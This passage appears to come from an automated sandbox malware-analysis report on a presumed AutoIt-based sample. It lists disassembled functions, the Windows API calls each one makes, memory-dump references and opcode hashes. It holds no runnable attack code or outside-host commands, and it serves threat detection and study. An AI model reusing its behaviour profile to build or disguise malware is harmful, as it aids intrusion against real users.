                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          • Opcode ID: 783ddb49703084ff353f32c764b9338a635f93ede39cfc51cb41b09f0f89e8c6
                                          • Instruction ID: ed0113d16c790b55fff770c099f64a9a9fac3c261cab633c9e208ca73c3112a5
                                          • Opcode Fuzzy Hash: 783ddb49703084ff353f32c764b9338a635f93ede39cfc51cb41b09f0f89e8c6
                                          • Instruction Fuzzy Hash: ED0192A164662D7BE204B620FC43EBF676CDF213DCB249125FE04F6283E6519E2182F0
                                          Function 00E34D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00E34D5C
                                          • __beginthreadex.LIBCMT ref: 00E34D7A
                                          • MessageBoxW.USER32(?,?,?,?), ref: 00E34D8F
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E34DA5
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E34DAC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                          • String ID:
                                          • API String ID: 3824534824-0
                                          • Opcode ID: 00d76e135c60a954946f500df299c603344714e5f4337986211284497f8a96b1
                                          • Instruction ID: 47f49b1acdfbd51af3e0bb8175067a5ee15569764f51a88b4b9f385e4299a904
                                          • Opcode Fuzzy Hash: 00d76e135c60a954946f500df299c603344714e5f4337986211284497f8a96b1
                                          • Instruction Fuzzy Hash: B01104B2904308BFC7019BB99C08AEB7FACEB45325F144267F914F32A1D6718D0887A0
                                          Function 00E2874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E28766
                                          • GetLastError.KERNEL32(?,00E2822A,?,?,?), ref: 00E28770
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00E2822A,?,?,?), ref: 00E2877F
                                          • RtlAllocateHeap.NTDLL(00000000,?,00E2822A), ref: 00E28786
                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E2879D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                          • String ID:
                                          • API String ID: 883493501-0
                                          • Opcode ID: f69e6a1206c716b97d3ab2c1e56aa1dc58c46e3d04c2c7bb751bafc7f2262f07
                                          • Instruction ID: 74ca88c076c4c2b1b448b505165cf10089ec1c08b91e1c5043f436e7f6d9e2cf
                                          • Opcode Fuzzy Hash: f69e6a1206c716b97d3ab2c1e56aa1dc58c46e3d04c2c7bb751bafc7f2262f07
                                          • Instruction Fuzzy Hash: 63014F71602214EFDB144FA6ED48D6B7B6CEF853567200469F849E3160DA718C14CA60
                                          Function 00E354E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E35502
                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E35510
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E35518
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E35522
                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E3555E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                          • String ID:
                                          • API String ID: 2833360925-0
                                          • Opcode ID: 20878b66851f24c585b87606b0a06229fd17d725f97a0d2d5241e137d4fc747a
                                          • Instruction ID: cb4d1a5f117aa51403bbdabb5ec9c2d3579ffd02d5c51bef7118a2db458d9d2c
                                          • Opcode Fuzzy Hash: 20878b66851f24c585b87606b0a06229fd17d725f97a0d2d5241e137d4fc747a
                                          • Instruction Fuzzy Hash: 31016D36C01A29EBCF04EFE9E94C5EDBF79FB09702F011856E802B2240DB30A654C7A1
                                          Function 00E27652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CLSIDFromProgID.COMBASE ref: 00E2766F
                                          • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00E2768A
                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E2758C,80070057,?,?), ref: 00E27698
                                          • CoTaskMemFree.COMBASE(00000000), ref: 00E276A8
                                          • CLSIDFromString.COMBASE(?,?), ref: 00E276B4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                          • String ID:
                                          • API String ID: 3897988419-0
                                          • Opcode ID: ace944770c8ed2f53923247edb25d1cdb18ec162ad4e1aa527f28f93b5bedc78
                                          • Instruction ID: 055daa7c702757df8a4e6077abc186397d10dc48ef97306e75c115b8ce93b1f8
                                          • Opcode Fuzzy Hash: ace944770c8ed2f53923247edb25d1cdb18ec162ad4e1aa527f28f93b5bedc78
                                          • Instruction Fuzzy Hash: 8B01D4B2601724BFDB145F19EC04BAA7FADEB44752F101028FD45F2211EB31DD0187A0
                                          Function 00E285F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E28608
                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E28612
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E28621
                                          • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00E28628
                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E2863E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocateErrorLastProcess
                                          • String ID:
                                          • API String ID: 47921759-0
                                          • Opcode ID: 97b677a4cdaa08a1b3f03bc3147bb7117b19851cf1b85934d93820c47a756c5e
                                          • Instruction ID: 24757c492089d8fa5a4ba5955fb87dc79bc61defd74e932cc2e919f706fe836e
                                          • Opcode Fuzzy Hash: 97b677a4cdaa08a1b3f03bc3147bb7117b19851cf1b85934d93820c47a756c5e
                                          • Instruction Fuzzy Hash: 02F0C234202315AFEB200FA6ED8DE6B3BACEF89759B001825F905E3190CF70DC45DA60
                                          Function 00E28652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E28669
                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E28673
                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E28682
                                          • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00E28689
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E2869F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocateErrorLastProcess
                                          • String ID:
                                          • API String ID: 47921759-0
                                          • Opcode ID: 309825ec0c0ed946c3c265332192c6e4fbc882ccec85b1904bbd414e5301857a
                                          • Instruction ID: 54d9001bf880e716c6e5ed339d031eae93d3aa427277b32a13fef51c479e73eb
                                          • Opcode Fuzzy Hash: 309825ec0c0ed946c3c265332192c6e4fbc882ccec85b1904bbd414e5301857a
                                          • Instruction Fuzzy Hash: F2F0C270202314AFEB111FA6EC8CE6B3BADEF8975AB140435F905E3190CB70DC04DA60
                                          Function 00E2C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 00E2C6BA
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E2C6D1
                                          • MessageBeep.USER32(00000000), ref: 00E2C6E9
                                          • KillTimer.USER32(?,0000040A), ref: 00E2C705
                                          • EndDialog.USER32(?,00000001), ref: 00E2C71F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                          • String ID:
                                          • API String ID: 3741023627-0
                                          • Opcode ID: 78e98a2e19c3c19f0bd3e74e8de7bf9a592179097c149ec4a59a904fc248b9c3
                                          • Instruction ID: 1d6b68a63550681ae0584c46f7e2f799152c8e6c28dce0643825395bcbf553a2
                                          • Opcode Fuzzy Hash: 78e98a2e19c3c19f0bd3e74e8de7bf9a592179097c149ec4a59a904fc248b9c3
                                          • Instruction Fuzzy Hash: 21018B305007149BEB256B21ED5EF9677B8FF04706F10156AF542B14E1DBF0A9588F91
                                          Function 00DD13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                          Download Yara Rule
                                          APIs
                                          • EndPath.GDI32(?), ref: 00DD13BF
                                          • StrokeAndFillPath.GDI32(?,?,00E0BAD8,00000000,?), ref: 00DD13DB
                                          • SelectObject.GDI32(?,00000000), ref: 00DD13EE
                                          • DeleteObject.GDI32 ref: 00DD1401
                                          • StrokePath.GDI32(?), ref: 00DD141C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                          • String ID:
                                          • API String ID: 2625713937-0
                                          • Opcode ID: d8d66b1f9fe40c9c4d39b96936aead66f739088627169cc43a3831879fe4a765
                                          • Instruction ID: ddc6b85c60976c06f7e08eabc0b65f0278e52875e0daff28534eb9efb3a37456
                                          • Opcode Fuzzy Hash: d8d66b1f9fe40c9c4d39b96936aead66f739088627169cc43a3831879fe4a765
                                          • Instruction Fuzzy Hash: 62F0C434004708EFDB295F67ED0C7583BA4EB01326F088227E569A91F1C7318999DF60
                                          Function 00E28E74 Relevance: 7.5, APIs: 5, Instructions: 23memorysynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E28E7F
                                          • CloseHandle.KERNEL32(?), ref: 00E28E94
                                          • CloseHandle.KERNEL32(?), ref: 00E28E9C
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00E28EA5
                                          • HeapFree.KERNEL32(00000000), ref: 00E28EAC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                          • String ID:
                                          • API String ID: 3751786701-0
                                          • Opcode ID: acff552435243b4a99c02aaaf46306ebb388aefeb9c48fc903630056884a6c20
                                          • Instruction ID: 2acc54d25ca0cedd72137da8611e8b7c77868db7498a46dde13643dc30bc44e0
                                          • Opcode Fuzzy Hash: acff552435243b4a99c02aaaf46306ebb388aefeb9c48fc903630056884a6c20
                                          • Instruction Fuzzy Hash: D5E0C236005601FFDA052FE2ED0C90ABB69FB89323B108A31F219A1471CB32A428DB50
                                          Function 00E3C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 00E3C69D
                                          • CoCreateInstance.COMBASE(00E62D6C,00000000,00000001,00E62BDC,?), ref: 00E3C6B5
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                          • CoUninitialize.COMBASE ref: 00E3C922
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                          • String ID: .lnk
                                          • API String ID: 2683427295-24824748
                                          • Opcode ID: ab9db9cf58de11660a622e59702ba22801fa960b8cb37cef75fae9f703276e30
                                          • Instruction ID: 338cda9d81025c777e24d22c35f189f1803a2a31452877e5ed10d48c942a49e9
                                          • Opcode Fuzzy Hash: ab9db9cf58de11660a622e59702ba22801fa960b8cb37cef75fae9f703276e30
                                          • Instruction Fuzzy Hash: 08A13A71108305AFD300EF64D891EABB7ECEF94304F00495DF196972A2EB71EA09CB62
                                          Function 00DE2E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF0FF6: std::exception::exception.LIBCMT ref: 00DF102C
                                            • Part of subcall function 00DF0FF6: __CxxThrowException@8.LIBCMT ref: 00DF1041
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                            • Part of subcall function 00DD7BB1: _memmove.LIBCMT ref: 00DD7C0B
                                          • __swprintf.LIBCMT ref: 00DE302D
                                          Strings
                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00DE2EC6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                          • API String ID: 1943609520-557222456
                                          • Opcode ID: 74b110b478a0ff49bb2ad8fa3eba0e987779998605031c71b0fd199da058deea
                                          • Instruction ID: eabd8772e020ea44d933d41bf858938fa4757fc171be6401de29e91aa06fc90b
                                          • Opcode Fuzzy Hash: 74b110b478a0ff49bb2ad8fa3eba0e987779998605031c71b0fd199da058deea
                                          • Instruction Fuzzy Hash: F0917F711087419FC728FF24D895C7EB7A8EF85740F05495EF485972A1EA20EE45CB72
                                          Function 00E3BBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DD48A1,?,?,00DD37C0,?), ref: 00DD48CE
                                          • CoInitialize.OLE32(00000000), ref: 00E3BC26
                                          • CoCreateInstance.COMBASE(00E62D6C,00000000,00000001,00E62BDC,?), ref: 00E3BC3F
                                          • CoUninitialize.COMBASE ref: 00E3BC5C
                                            • Part of subcall function 00DD9997: __itow.LIBCMT ref: 00DD99C2
                                            • Part of subcall function 00DD9997: __swprintf.LIBCMT ref: 00DD9A0C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                          • String ID: .lnk
                                          • API String ID: 2126378814-24824748
                                          • Opcode ID: 3c18ed43e7c6d2a4f14e24cb110db7167401908400fe402fd5e97ff0992f1843
                                          • Instruction ID: 09183d295924be4a6d9670d2cac2cc11b5d870846983bf259219fa7ed52134d9
                                          • Opcode Fuzzy Hash: 3c18ed43e7c6d2a4f14e24cb110db7167401908400fe402fd5e97ff0992f1843
                                          • Instruction Fuzzy Hash: 11A17A752043019FCB14DF24C494D6ABBE5FF88314F049999F99AAB3A1CB32ED45CBA1
                                          Function 00E2B7B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OleSetContainedObject.OLE32(?,00000001), ref: 00E2B981
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ContainedObject
                                          • String ID: AutoIt3GUI$Container$%
                                          • API String ID: 3565006973-1286912533
                                          • Opcode ID: a5a136bdf0f0af23359bd6901b892044ec16c5f492da8c4304bc130218f16db0
                                          • Instruction ID: e3c3668a2e192bb91a882a1a6395fdb28b08423312b0c7122bd6769a1806bb28
